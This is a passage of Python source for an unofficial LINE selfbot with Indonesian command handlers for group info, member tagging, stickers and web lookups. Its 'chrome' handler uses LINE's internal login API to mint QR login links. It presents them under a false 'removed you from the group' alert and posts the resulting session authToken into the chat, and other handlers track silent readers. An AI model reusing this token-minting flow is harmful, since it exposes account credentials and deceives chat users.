}
},
"hero": {
"type": "image",
"aspectRatio": "20:13",
"aspectMode": "cover",
"url": "https://obs.line-scdn.net/{}".format(group.pictureStatus),
"size": "full",
"margin": "xl"
},
"footer": {
"type": "box",
"layout": "vertical",
"contents": [{
"type": "box",
"layout": "horizontal",
"contents": [{
"type": "button",
"flex": 2,
"style": "primary",
"color": "#006400",
"height": "sm",
"action": {
"type": "uri",
"label": "OFFICIAL",
"uri": "https://line.me/R/ti/p/%40bvb1195k"
}
}, {
"flex": 3,
"type": "button",
"style": "primary",
"color": "#800000",
"margin": "sm",
"height": "sm",
"action": {
"type": "uri",
"label": "CREATOR",
"uri": "http://line.me/ti/p/~denjaka-inexx"
}
}]
}]
}
}
}
cl.sendFlex(to, data)
elif cmd.startswith("infogrup "):
if msg._from in admin:
separate = text.split(" ")
number = text.replace(separate[0] + " ","")
groups = cl.getGroupIdsJoined()
ret_ = ""
try:
group = groups[int(number)-1]
G = cl.getGroup(group)
try:
gCreator = G.creator.displayName
except:
gCreator = "Tidak ditemukan"
if G.invitee is None:
gPending = "0"
else:
gPending = str(len(G.invitee))
if G.preventedJoinByTicket == True:
gQr = "Tertutup"
gTicket = "Tidak ada"
else:
gQr = "Terbuka"
gTicket = "https://line.me/R/ti/g/{}".format(str(cl.reissueGroupTicket(G.id)))
timeCreated = []
timeCreated.append(time.strftime("%d-%m-%Y [ %H:%M:%S ]", time.localtime(int(G.createdTime) / 1000)))
ret_ += " ☠•➤Grup Info\n"
ret_ += "\n☠•➤Nama Group : {}".format(G.name)
ret_ += "\n☠•➤ID Group : {}".format(G.id)
ret_ += "\n☠•➤Pembuat : {}".format(gCreator)
ret_ += "\n☠•➤Waktu Dibuat : {}".format(str(timeCreated))
ret_ += "\n☠•➤Jumlah Member : {}".format(str(len(G.members)))
ret_ += "\n☠•➤Jumlah Pending : {}".format(gPending)
ret_ += "\n☠•➤Group Qr : {}".format(gQr)
ret_ += "\n☠•➤Group Ticket : {}".format(gTicket)
ret_ += ""
sendTextTemplate(to, str(ret_))
except:
pass
elif msg.text.lower().startswith("chrome"):
separate = msg.text.split(" ")
jmlh = int(separate[1])
for x in range(jmlh):
Headers3.update({'x-lpqs' : '/api/v4/TalkService.do'})
transport = THttpClient.THttpClient('https://gd2.line.naver.jp/api/v4/TalkService.do')
transport.setCustomHeaders(Headers3)
protocol = TCompactProtocol.TCompactProtocol(transport)
client = LineService.Client(protocol)
qr = client.getAuthQrcode(keepLoggedIn=1, systemName=nama1)
link = "line://au/q/" + qr.verifier
print(link)
data = {
"type": "flex",
"altText": "{} menghapus anda dari grup".format(cl.getProfile().displayName),
"contents": {
"type": "bubble",
"body": {
"type": "box",
"layout": "horizontal",
"spacing": "md",
"contents": [
{
"type": "box",
"layout": "vertical",
"flex": 2,
"contents": [
{
"type": "text",
"text": "sᴇɢᴇʀᴀ ᴋʟɪᴋ ʟᴏɢɪɴ ᴜɴᴛᴜᴋ ʟᴏɢɪɴ,\nᴅᴀɴ ᴋʟɪᴋ ʟɪɴᴋ ᴜɴᴛᴜᴋ ᴍᴇɴᴀᴍᴘɪʟᴋᴀɴ ʟɪɴᴋ.",
"size": "md",
"weight": "bold",
"wrap": True,
"color": "#40E0D0",
"align": "center"
},
]
}
]
},
"styles": {
"body": {
"backgroundColor": "#000000"
},
"footer": {
"backgroundColor": "#00008B"
},
"header": {
"backgroundColor": "#00008B"
}
},
"hero": {
"type": "image",
"aspectRatio": "20:13",
"aspectMode": "cover",
"url": "https://scontent.fcgk8-1.fna.fbcdn.net/v/t1.0-9/fr/cp0/e15/q65/51689146_2326064860750957_3568131342002552832_o.jpg?_nc_cat=100&efg=eyJpIjoiYiJ9&_nc_eui2=AeEKUakDYnXikuMkE8vPPZhxEuKQRqPyo08BbWoruGL-DN9mYH2NmCnik886MGJCiMS8D7ZSUmabSAcRk7S3_GwwhAIKCVBmiq32OaYa0XaV-w&_nc_oc=AQmPqDNEtZ1BaAsV88hv6Omtb4iAYtqLIB5eZ246K8p9zIaCWAh_LZUH4IJCIf6Izco&_nc_ht=scontent.fcgk8-1.fna&oh=1b6bbfe37e1ee80e79e251928d173319&oe=5D78D8F5",
"size": "full",
"margin": "xl"
},
"footer": {
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": "LOGIN",
"size": "xl",
"wrap": True,
"weight": "bold",
"color": "#7CFC00",
"action": {
"type": "uri",
"uri": str(link)
},
"align": "center"
},
{
"type": "separator",
"color": "#E5E4E2"
},
{
"type": "text",
"text": "LINK",
"size": "xl",
"wrap": True,
"weight": "bold",
"color": "#FFD700",
"action": {
"type": "uri",
"uri": "line://app/1602687308-GXq4Vvk9/?type=text&text="+str(link)
},
"align": "center"
}
]
},
"header": {
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": "CHROMEOS",
"size": "xl",
"wrap": True,
"weight": "bold",
"color": "#000000",
"align": "center"
}
]
}
}
}
cl.sendFlex(to, data)
Headers3.update({"x-lpqs" : '/api/v4/TalkService.do', 'X-Line-Access': qr.verifier})
json.loads(requests.session().get('https://gd2.line.naver.jp/Q', headers=Headers3).text)
Headers3.update({'x-lpqs' : '/api/v4p/rs'})
transport = THttpClient.THttpClient('https://gd2.line.naver.jp/api/v4p/rs')
transport.setCustomHeaders(Headers3)
protocol = TCompactProtocol.TCompactProtocol(transport)
client = LineService.Client(protocol)
req = LoginRequest()
req.type = 1
req.verifier = qr.verifier
req.e2eeVersion = 1
res = client.loginZ(req)
print('\n')
print(res.authToken)
else:
cl.sendMessage(msg.to,str(res.authToken))
cl.sendMessage(msg.to, "Jika ini bukan Anda, silakan ketuk tautan di bawah ini \n\nline://nv/connectedDevices/")
elif text.lower() == 'tokenlist':
url = "https://game.linefriends.com/jbp-lcs-ranking/lcs/sendMessage"
to = msg.to
data = {
"type": "template",
"altText": "Tokenlist",
"template": {
"type": "carousel",
"actions": [],
"columns": [
{
"thumbnailImageUrl": "https://scontent.fcgk8-1.fna.fbcdn.net/v/t1.0-9/fr/cp0/e15/q65/51689146_2326064860750957_3568131342002552832_o.jpg?_nc_cat=100&efg=eyJpIjoiYiJ9&_nc_eui2=AeEKUakDYnXikuMkE8vPPZhxEuKQRqPyo08BbWoruGL-DN9mYH2NmCnik886MGJCiMS8D7ZSUmabSAcRk7S3_GwwhAIKCVBmiq32OaYa0XaV-w&_nc_oc=AQmPqDNEtZ1BaAsV88hv6Omtb4iAYtqLIB5eZ246K8p9zIaCWAh_LZUH4IJCIf6Izco&_nc_ht=scontent.fcgk8-1.fna&oh=1b6bbfe37e1ee80e79e251928d173319&oe=5D78D8F5",
"title": "CHROMEOS",
"text": "ɪɴᴇxʙᴏᴛs.ʙᴏᴛʟɪɴᴇ \nKETIK [ CHROME 1 ]",
"actions": [
{
"type": "uri",
"label": "CLICK",
"uri": "line://app/1602687308-GXq4Vvk9/?type=text&text=ChromeSpaces1"
}
]
},
{
"thumbnailImageUrl": "https://scontent.fcgk8-2.fna.fbcdn.net/v/t1.0-9/fr/cp0/e15/q65/52427967_2326064874084289_579878214831177728_o.jpg?_nc_cat=107&efg=eyJpIjoiYiJ9&_nc_eui2=AeHb8CgrGa9k6YnEI4S68ZQqC_ofKGrLNvSnsbK6vezlyCteVLjGJZYC9Gwoh3fTmSPhRQs-xosP2j1ETI4AHqVhfgT-G_SK8iIfg1i_tCVZwQ&_nc_ht=scontent.fcgk8-2.fna&oh=3e47f989cae4e4f99830f7b88b609f6c&oe=5D64AB31",
"title": "IOSIPAD",
"text": "ɪɴᴇxʙᴏᴛs.ʙᴏᴛʟɪɴᴇ \nKETIK [ IOS 1 ]",
"actions": [
{
"type": "uri",
"label": "CLICK",
"uri": "line://app/1623679774-k9nBDB6b?type=text&text=IosSpaces1"
}
]
},
{
"thumbnailImageUrl": "https://scontent.fcgk8-2.fna.fbcdn.net/v/t1.0-9/fr/cp0/e15/q65/51739687_2326067977417312_5830327879942012928_n.jpg?_nc_cat=109&efg=eyJpIjoiYiJ9&_nc_eui2=AeELQzPVVYeHGkeaNu6tEg6GIqkb-hDBp8pMBsjM4_rXbuJYVVEcb77aNnsGPeT-5hjb2XqL-XnHtJZVnvijNeEDIIgYJoyoyquG9aOj2-BBhg&_nc_ht=scontent.fcgk8-2.fna&oh=4f2d6231f4b094ac6df246b28023212a&oe=5D31A0B0",
"title": "DESKTOPWIN",
"text": "ɪɴᴇxʙᴏᴛs.ʙᴏᴛʟɪɴᴇ \nKETIK [ DESKTOPWIN 1 ]",
"actions": [
{
"type": "uri",
"label": "CLICK",
"uri": "line://app/1623679774-k9nBDB6b?type=text&text=DesktopwinSpaces1"
}
]
},
{
"thumbnailImageUrl": "https://scontent.fcgk8-2.fna.fbcdn.net/v/t1.0-9/fr/cp0/e15/q65/52427967_2326064874084289_579878214831177728_o.jpg?_nc_cat=107&efg=eyJpIjoiYiJ9&_nc_eui2=AeHb8CgrGa9k6YnEI4S68ZQqC_ofKGrLNvSnsbK6vezlyCteVLjGJZYC9Gwoh3fTmSPhRQs-xosP2j1ETI4AHqVhfgT-G_SK8iIfg1i_tCVZwQ&_nc_ht=scontent.fcgk8-2.fna&oh=3e47f989cae4e4f99830f7b88b609f6c&oe=5D64AB31",
"title": "DESKTOPMAC",
"text": "ɪɴᴇxʙᴏᴛs.ʙᴏᴛʟɪɴᴇ \nKETIK [ MAC 1 ]",
"actions": [
{
"type": "uri",
"label": "CLICK",
"uri": "line://app/1623679774-k9nBDB6b?type=text&text=MacSpaces1"
}
]
},
{
"thumbnailImageUrl": "https://scontent.fcgk8-1.fna.fbcdn.net/v/t1.0-9/fr/cp0/e15/q65/51689146_2326064860750957_3568131342002552832_o.jpg?_nc_cat=100&efg=eyJpIjoiYiJ9&_nc_eui2=AeEKUakDYnXikuMkE8vPPZhxEuKQRqPyo08BbWoruGL-DN9mYH2NmCnik886MGJCiMS8D7ZSUmabSAcRk7S3_GwwhAIKCVBmiq32OaYa0XaV-w&_nc_oc=AQmPqDNEtZ1BaAsV88hv6Omtb4iAYtqLIB5eZ246K8p9zIaCWAh_LZUH4IJCIf6Izco&_nc_ht=scontent.fcgk8-1.fna&oh=1b6bbfe37e1ee80e79e251928d173319&oe=5D78D8F5",
"title": "WIN10",
"text": "ɪɴᴇxʙᴏᴛs.ʙᴏᴛʟɪɴᴇ \nKETIK [ WIN10 1 ]",
"actions": [
{
"type": "uri",
"label": "CLICK",
"uri": "line://app/1623679774-k9nBDB6b?type=text&text=win10spaces1"
}
]
}
]
}
}
cl.sendFlex(to, data)
elif cmd.startswith("infomem "):
if msg._from in admin:
separate = msg.text.split(" ")
number = msg.text.replace(separate[0] + " ","")
groups = cl.getGroupIdsJoined()
ret_ = ""
try:
group = groups[int(number)-1]
G = cl.getGroup(group)
no = 0
ret_ = ""
for mem in G.members:
no += 1
ret_ += "\n " "☠•➤"+ str(no) + ". " + mem.displayName
sendTextTemplate(to,"☠•➤Group Name : [ " + str(G.name) + " ]\n\n [ List Member ]\n" + ret_ + "\n\n「Total %i Members」" % len(G.members))
except:
pass
elif cmd.startswith("leave: "):
if msg._from in admin:
separate = msg.text.split(" ")
number = msg.text.replace(separate[0] + " ","")
groups = cl.getGroupIdsJoined()
group = groups[int(number)-1]
for i in group:
ginfo = cl.getGroup(i)
if ginfo == group:
cl.leaveGroup(i)
sendTextTemplate(msg.to,"Berhasil keluar di grup " +str(ginfo.name))
elif cmd == "friendlist":
if wait["selfbot"] == True:
if msg._from in admin:
ma = ""
a = 0
gid = cl.getAllContactIds()
for i in gid:
G = cl.getContact(i)
a = a + 1
end = "\n"
ma += "╠☠•➤" + str(a) + ". " +G.displayName+ "\n"
sendTextTemplate(msg.to,"╔═☠•➤[ FRIEND LIST ]\n║\n"+ma+"║\n╚═☠•➤[ Total「"+str(len(gid))+"」Friends ]")
elif cmd == "gruplist":
if wait["selfbot"] == True:
if msg._from in admin:
ma = ""
a = 0
gid = cl.getGroupIdsJoined()
for i in gid:
G = cl.getGroup(i)
a = a + 1
end = "\n"
ma += "╠☠•➤" + str(a) + ". " +G.name+ "\n"
sendTextTemplate1(msg.to,"╔═☠•➤[ GROUP LIST ]\n║\n"+ma+"║\n╚═☠•➤[ Total「"+str(len(gid))+"」Groups ]")
elif cmd == "open":
if wait["selfbot"] == True:
if msg._from in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.preventedJoinByTicket = False
cl.updateGroup(X)
sendTextTemplate(msg.to, "Url Opened")
elif cmd == "close":
if wait["selfbot"] == True:
if msg._from in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.preventedJoinByTicket = True
cl.updateGroup(X)
sendTextTemplate(msg.to, "Url Closed")
elif cmd == "gurl":
if wait["selfbot"] == True:
if msg._from in admin:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventedJoinByTicket == True:
x.preventedJoinByTicket = False
cl.updateGroup(x)
gurl = cl.reissueGroupTicket(msg.to)
cl.sendMessage(msg.to, "Nama : "+str(x.name)+ "\nUrl grup : http://line.me/R/ti/g/"+gurl)
#===========BOT UPDATE============#
elif cmd == "updategrup":
if wait["selfbot"] == True:
if msg._from in admin:
if msg.toType == 2:
settings["groupPicture"] = True
sendTextTemplate(msg.to,"Kirim fotonya.....")
elif cmd == "myup":
if wait["selfbot"] == True:
if msg._from in admin:
Setmain["ARfoto"][mid] = True
sendTextTemplate(msg.to,"Kirim fotonya.....")
elif cmd.startswith("myname: "):
if msg._from in admin:
separate = msg.text.split(" ")
string = msg.text.replace(separate[0] + " ","")
if len(string) <= 10000000000:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
sendTextTemplate(msg.to,"Nama diganti jadi " + string + "")
#===========BOT UPDATE============#
elif cmd == "inex" or text.lower() == "tag":
if wait["selfbot"] == True:
if msg._from in admin:
group = cl.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
k = len(nama)//20
for a in range(k+1):
txt = u''
s=0
b=[]
for i in group.members[a*20 : (a+1)*20]:
b.append(i.mid)
mentionMembers(msg.to, b)
elif cmd.startswith("tag room: "):
if wait["selfbot"] == True:
if msg._from in admin:
separate = msg.text.split(":")
number = msg.text.replace(separate[0] + ":"," ")
groups = cl.getGroupIdsJoined()
gid = groups[int(number)-1]
group = cl.getGroup(gid)
nama = [contact.mid for contact in group.members]
k = len(nama)//20
for a in range(k+1):
txt = u''
s=0
b=[]
for i in group.members[a*20 : (a+1)*20]:
b.append(i.mid)
mentionMembers(gid, b)
cl.sendMessage(msg.to, "Berhasil Mention Member di Group: \n " + str(group.name))
elif cmd == "adminlist":
if wait["selfbot"] == True:
if msg._from in admin:
ma = ""
mb = ""
mc = ""
a = 0
b = 0
c = 0
for m_id in owner:
a = a + 1
end = '\n'
ma += str(a) + ". " +cl.getContact(m_id).displayName + "\n"
for m_id in admin:
b = b + 1
end = '\n'
mb += str(b) + ". " +cl.getContact(m_id).displayName + "\n"
for m_id in staff:
c = c + 1
end = '\n'
mc += str(c) + ". " +cl.getContact(m_id).displayName + "\n"
sendTextTemplate(msg.to,"☠•➤admin\n\nSuper admin:\n"+ma+"\nAdmin:\n"+mb+"\nStaff:\n"+mc+"\nTotal「%s」 Rkf" %(str(len(owner)+len(admin)+len(staff))))
elif cmd == "prolist":
if wait["selfbot"] == True:
if msg._from in admin:
ma = ""
mb = ""
mc = ""
md = ""
a = 0
b = 0
c = 0
d = 0
gid = protectqr
for group in gid:
a = a + 1
end = '\n'
ma += str(a) + ". " +cl.getGroup(group).name + "\n"
gid = protectkick
for group in gid:
b = b + 1
end = '\n'
mb += str(b) + ". " +cl.getGroup(group).name + "\n"
gid = protectjoin
for group in gid:
d = d + 1
end = '\n'
md += str(d) + ". " +cl.getGroup(group).name + "\n"
gid = protectcancel
for group in gid:
c = c + 1
end = '\n'
mc += str(c) + ". " +cl.getGroup(group).name + "\n"
sendTextTemplate3(msg.to,"☠•➤Protection\n\n☠•➤PROTECT URL :\n"+ma+"\n☠•➤PROTECT KICK :\n"+mb+"\n☠•➤PROTECT INVITE :\n"+mb+"\n☠•➤PROTECT JOIN :\n"+md+"\n☠•➤PROTECT CANCEL:\n"+mc+"\nTotal「%s」Grup yg dijaga" %(str(len(protectqr)+len(protectkick)+len(protectjoin)+len(protectantijs)+len(ghost)+len(protectcancel))))
elif cmd == "pamit" or cmd == "byeme":
if wait["selfbot"] == True:
if msg._from in admin:
G = cl.getGroup(msg.to)
sendTextTemplate(msg.to, "Mohon maaf bila da salah baik lisan maupun tulisan\nBye my fams "+str(G.name))
cl.leaveGroup(msg.to)
elif cmd == "sprespon":
if wait["selfbot"] == True:
if msg._from in admin:
get_profile_time_start = time.time()
get_profile = cl.getProfile()
get_profile_time = time.time() - get_profile_time_start
get_group_time_start = time.time()
get_group = cl.getGroupIdsJoined()
get_group_time = time.time() - get_group_time_start
get_contact_time_start = time.time()
get_contact = cl.getContact(mid)
get_contact_time = time.time() - get_contact_time_start
sendTextTemplate(msg.to, "☠•➤Speed respon\n\n - Get Profile\n %.10f\n - Get Contact\n %.10f\n - Get Group\n %.10f" % (get_profile_time/3,get_contact_time/3,get_group_time/3))
elif cmd == "speed" or cmd == "sp":
if wait["selfbot"] == True:
if msg._from in admin:
start = time.time()
sendTextTemplate(msg.to, "Speed Ngaciiirrr...")
elapsed_time = time.time() - start
sendTextTemplate(msg.to, "{} detik".format(str(elapsed_time)))
elif cmd == "lurking on":
if wait["selfbot"] == True:
if msg._from in admin:
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
Setmain['ARreadPoint'][msg.to] = msg_id
Setmain['ARreadMember'][msg.to] = {}
sendTextTemplate(msg.to, "Lurking berhasil diaktifkan\n\nTanggal : "+ datetime.strftime(timeNow,'%Y-%m-%d')+"\nJam [ "+ datetime.strftime(timeNow,'%H:%M:%S')+" ]")
elif cmd == "lurking off":
if wait["selfbot"] == True:
if msg._from in admin:
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
del Setmain['ARreadPoint'][msg.to]
del Setmain['ARreadMember'][msg.to]
sendTextTemplate(msg.to, "Lurking berhasil dinoaktifkan\n\nTanggal : "+ datetime.strftime(timeNow,'%Y-%m-%d')+"\nJam [ "+ datetime.strftime(timeNow,'%H:%M:%S')+" ]")
elif cmd == "lurkers":
if msg._from in admin:
if msg.to in Setmain['ARreadPoint']:
if Setmain['ARreadMember'][msg.to] != {}:
aa = []
for x in Setmain['ARreadMember'][msg.to]:
aa.append(x)
try:
arrData = ""
textx = " [ Result {} member ] \n\n [ Lurkers ]\n1. ".format(str(len(aa)))
arr = []
no = 1
b = 1
for i in aa:
b = b + 1
end = "\n"
mention = "@x\n"
slen = str(len(textx))
elen = str(len(textx) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':i}
arr.append(arrData)
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
textx += mention
if no < len(aa):
no += 1
textx += str(b) + ". "
else:
try:
no = "[ {} ]".format(str(cl.getGroup(msg.to).name))
except:
no = " "
msg.to = msg.to
msg.text = textx+"\nTanggal : "+ datetime.strftime(timeNow,'%Y-%m-%d')+"\nJam [ "+ datetime.strftime(timeNow,'%H:%M:%S')+" ]"
msg.contentMetadata = {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}
msg.contentType = 0
cl.sendMessage(msg)
except:
pass
try:
del Setmain['ARreadPoint'][msg.to]
del Setmain['ARreadMember'][msg.to]
except:
pass
Setmain['ARreadPoint'][msg.to] = msg.id
Setmain['ARreadMember'][msg.to] = {}
else:
sendTextTemplate(msg.to, "User kosong...")
else:
sendTextTemplate(msg.to, "Ketik lurking on dulu")
elif cmd == "sider on" or cmd == "x on":
if wait["selfbot"] == True:
if msg._from in admin:
try:
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
sendTextTemplate(msg.to, "Cek sider diaktifkan\n\nTanggal : "+ datetime.strftime(timeNow,'%Y-%m-%d')+"\nJam [ "+ datetime.strftime(timeNow,'%H:%M:%S')+" ]")
cl.sendMessage(msg.to, "Inex")
del cctv['point'][msg.to]
del cctv['sidermem'][msg.to]
del cctv['cyduk'][msg.to]
except:
pass
cctv['point'][msg.to] = msg.id
cctv['sidermem'][msg.to] = ""
cctv['cyduk'][msg.to]=True
elif cmd == "sider off" or cmd == "x off":
if wait["selfbot"] == True:
if msg._from in admin:
if msg.to in cctv['point']:
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
cctv['cyduk'][msg.to]=False
sendTextTemplate(msg.to, "Cek sider dinonaktifkan\n\nTanggal : "+ datetime.strftime(timeNow,'%Y-%m-%d')+"\nJam [ "+ datetime.strftime(timeNow,'%H:%M:%S')+" ]\n"+cctv['sidermem'][msg.to])
else:
sendTextTemplate(msg.to, "Sudak tidak aktif")
#===========Hiburan============#
elif cmd.startswith("profileig: "):
if msg._from in admin:
try:
sep = msg.text.split(" ")
instagram = msg.text.replace(sep[0] + " ","")
response = requests.get("https://www.instagram.com/"+instagram+"?__a=1")
data = response.json()
namaIG = str(data['user']['full_name'])
bioIG = str(data['user']['biography'])
mediaIG = str(data['user']['media']['count'])
verifIG = str(data['user']['is_verified'])
usernameIG = str(data['user']['username'])
followerIG = str(data['user']['followed_by']['count'])
profileIG = data['user']['profile_pic_url_hd']
privateIG = str(data['user']['is_private'])
followIG = str(data['user']['follows']['count'])
link = "☠•➤Link : " + "https://www.instagram.com/" + instagram
text = "☠•➤Name : "+namaIG+"\n☠•➤Username : "+usernameIG+"\n☠•➤Biography : "+bioIG+"\n☠•➤Follower : "+followerIG+"\n☠•➤Following : "+followIG+"\n☠•➤Post : "+mediaIG+"\n☠•➤Verified : "+verifIG+"\n☠•➤Private : "+privateIG+"" "\n" + link
cl.sendImageWithURL(msg.to, profileIG)
cl.sendMessage(msg.to, str(text))
except Exception as e:
cl.sendMessage(msg.to, str(e))
elif cmd.startswith("cekdate: "):
if msg._from in admin:
sep = msg.text.split(" ")
tanggal = msg.text.replace(sep[0] + " ","")
r=requests.get('https://script.google.com/macros/exec?service=AKfycbw7gKzP-WYV2F5mc9RaR7yE3Ve1yN91Tjs91hp_jHSE02dSv9w&nama=ervan&tanggal='+tanggal)
data=r.text
data=json.loads(data)
lahir = data["data"]["lahir"]
usia = data["data"]["usia"]
ultah = data["data"]["ultah"]
zodiak = data["data"]["zodiak"]
sendTextTemplate(msg.to,"☠•➤I N F O R M A S I •☠ \n\n"+"☠•➤Date Of Birth : "+lahir+"\n☠•➤Age : "+usia+"\n☠•➤Ultah : "+ultah+"\n☠•➤Zodiak : "+zodiak)
elif 'ID line: ' in msg.text:
if wait["selfbot"] == True:
if msg._from in admin:
msgs = msg.text.replace('ID line: ','')
conn = cl.findContactsByUserid(msgs)
if True:
cl.sendMessage(msg.to, "http://line.me/ti/p/~" + msgs)
cl.sendMessage(msg.to, None, contentMetadata={'mid': conn.mid}, contentType=13)
elif "mudik" in msg.text.lower():
url = "https://game.linefriends.com/jbp-lcs-ranking/lcs/sendMessage"
to = msg.to
data = {
"type": "template",
"altText": "{} sent a sticker".format(cl.getProfile().displayName),
"template": {
"type": "image_carousel",
"columns": [
{
"imageUrl": "https://4.bp.blogspot.com/-g9bAUWEmJVo/Wx8oA__cmPI/AAAAAAALbhg/eDKroutr6QIgDBB2wpPL2e7nLnjIEVOxQCLcBGAs/s1600/AS0004076_03.gif",
"size": "full",
"action": {
"type": "uri",
"uri": "https://line.me/S/sticker/12555"
}
}
]
}
}
cl.sendFlex(to, data)
elif "lebaran" in msg.text.lower():
url = "https://game.linefriends.com/jbp-lcs-ranking/lcs/sendMessage"
to = msg.to
data = {
"type": "template",
"altText": "{} sent a sticker".format(cl.getProfile().displayName),
"template": {
"type": "image_carousel",
"columns": [
{
"imageUrl": "https://1.bp.blogspot.com/-ru5h6ZY1uR0/WSrEX_FADtI/AAAAAAAIGyA/MMCCNrPHXWsiv2qYMxeMekA2uYRQM081QCLcB/s1600/AW434676_01.gif",
"size": "full",
"action": {
"type": "uri",
"uri": "https://line.me/S/sticker/12555"
}
}
]
}
}
cl.sendFlex(to, data)
elif "thr" in msg.text.lower():
url = "https://game.linefriends.com/jbp-lcs-ranking/lcs/sendMessage"
to = msg.to
data = {
"type": "template",
"altText": "{} sent a sticker".format(cl.getProfile().displayName),
"template": {
"type": "image_carousel",
"columns": [
{
"imageUrl": "https://3.bp.blogspot.com/-gCrm8mfdw1A/Wx8oCN7i2VI/AAAAAAALbhs/s15NruyynGMGNLidxBFSdsW8KwzoZNuYgCLcBGAs/s1600/AS0004076_06.gif",
"size": "full",
"action": {
"type": "uri",
"uri": "https://line.me/S/sticker/12555"
}
}
]
}
}
cl.sendFlex(to, data)
elif "mohon maaf" in msg.text.lower():
url = "https://game.linefriends.com/jbp-lcs-ranking/lcs/sendMessage"
to = msg.to
data = {
"type": "template",
"altText": "{} sent a sticker".format(cl.getProfile().displayName),
"template": {
"type": "image_carousel",
"columns": [
{
"imageUrl": "https://1.bp.blogspot.com/-w6uzVV3N2D0/Wx8oBbIK_rI/AAAAAAALbhk/P56hLDKJKHU9udV6T3O_E89X3QlSmC6FACLcBGAs/s1600/AS0004076_04.gif",
"size": "full",
"action": {
"type": "uri",
"uri": "https://line.me/S/sticker/12555"
}
}
]
}
}
cl.sendFlex(to, data)
elif "gak puasa" in msg.text.lower():
url = "https://game.linefriends.com/jbp-lcs-ranking/lcs/sendMessage"
to = msg.to
data = {
"type": "template",
"altText": "{} sent a sticker".format(cl.getProfile().displayName),
"template": {
"type": "image_carousel",
"columns": [
{
"imageUrl": "https://media.tenor.com/images/13253695f2b4e34f7514848d0d118180/tenor.gif",
"size": "full",
"action": {
"type": "uri",
"uri": "https://line.me/S/sticker/12555"
}
}
]
}
}
cl.sendFlex(to, data)
elif "bentar lagi" in msg.text.lower():
url = "https://game.linefriends.com/jbp-lcs-ranking/lcs/sendMessage"
to = msg.to
data = {
"type": "template",
"altText": "{} sent a sticker".format(cl.getProfile().displayName),
"template": {
"type": "image_carousel",
"columns": [
{
"imageUrl": "https://1.bp.blogspot.com/-4iM3cPRrNXY/WSrEX0LirGI/AAAAAAAIGyE/Y4bxdP2GFwIbVyZYhY8UMfNQAyv0mCexACLcB/s1600/AW434676_00.gif",
"size": "full",
"action": {
"type": "uri",
"uri": "https://line.me/S/sticker/12555"
}
}
]
}
}
cl.sendFlex(to, data)
elif "takbiran" in msg.text.lower():
url = "https://game.linefriends.com/jbp-lcs-ranking/lcs/sendMessage"
to = msg.to
data = {
"type": "template",
"altText": "{} sent a sticker".format(cl.getProfile().displayName),
"template": {
"type": "image_carousel",
"columns": [
{
"imageUrl": "https://3.bp.blogspot.com/-a4GQlMKGzjc/Wx8n_4IRObI/AAAAAAALbhU/9BRM5S93t7kTXl0fou0XsY4jxlCcb3d2wCLcBGAs/s1600/AS0004076_00.gif",
"size": "full",
"action": {
"type": "uri",
"uri": "https://line.me/S/sticker/12555"
}
}
]
}
}
cl.sendFlex(to, data)
elif text.lower() == 'hahahaha':
url = "https://game.linefriends.com/jbp-lcs-ranking/lcs/sendMessage"
to = msg.to
data = {
"type": "template",
"altText": "{} sent a sticker".format(cl.getProfile().displayName),
"template": {
"type": "image_carousel",
"columns": [
{
"imageUrl": "https://4.bp.blogspot.com/-W_bn2qqdYXE/Wyhbjj2wqKI/AAAAAAANIz4/KQVsbq-aXm0kZNfFOS5SN8fqCvQ18xnUACLcBGAs/s1600/AW1238502_03.gif",
"size": "full",
"action": {
"type": "uri",
"uri": "http://line.me/ti/p/~denjaka-inexx"
}
}
]
}
}
cl.sendFlex(to, data)
elif text.lower() == 'apass':
url = "https://game.linefriends.com/jbp-lcs-ranking/lcs/sendMessage"
to = msg.to
data = {
"type": "template",
"altText": "{} sent a sticker".format(cl.getProfile().displayName),
"template": {
"type": "image_carousel",
"columns": [
{
"imageUrl": "https://c-sf.smule.com/sf/s92/arr/96/be/8cf86704-a6c2-4e0c-b3c6-faaeae27ec87.jpg",
"size": "full",
"action": {
"type": "uri",
"uri": "http://line.me/ti/p/~denjaka-inexx"
}
}
]
}
}
cl.sendFlex(to, data)
elif "pas band" in msg.text.lower():
url = "https://game.linefriends.com/jbp-lcs-ranking/lcs/sendMessage"
to = msg.to
data = {
"type": "template",
"altText": "{} sent a sticker".format(cl.getProfile().displayName),
"template": {
"type": "image_carousel",
"columns": [
{
"imageUrl": "https://encrypted-tbn0.gstatic.com/images?q=tbn%3AANd9GcSpSWAXZ0y0WKUwH_4QwoUQ8BEev3ZHxnI5jKl5pnwTTLSo_EIo",
"size": "full",
"action": {
"type": "uri",
"uri": "http://line.me/ti/p/~denjaka-inexx"
}
}
]
}
}
cl.sendFlex(to, data)
elif "youtube" in msg.text.lower():
if msg._from in admin:
try:
sep = msg.text.split(" ")
textToSearch = msg.text.replace(sep[0] + " ","")
query = urllib.parse.quote(textToSearch)
search_url="https://www.youtube.com/results?search_query="
mozhdr = {'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3'}
sb_url = search_url + query
sb_get = requests.get(sb_url, headers = mozhdr)
soupeddata = BeautifulSoup(sb_get.content, "html.parser")
yt_links = soupeddata.find_all("a", class_ = "yt-uix-tile-link")
x = (yt_links[1])
yt_href = x.get("href")
yt_href = yt_href.replace("watch?v=", "")
qx = "https://youtu.be" + str(yt_href)
vid = pafy.new(qx)
stream = vid.streams
best = vid.getbest()
best.resolution, best.extension
for s in stream:
me = best.url
data = {
"type": "flex",
"altText": "YOUTUBE",
"contents": {
"styles": {
"body": {
"backgroundColor": "#FFFFFF"
},
"footer": {
"backgroundColor": "#FF0000"
}
},
"type": "bubble",
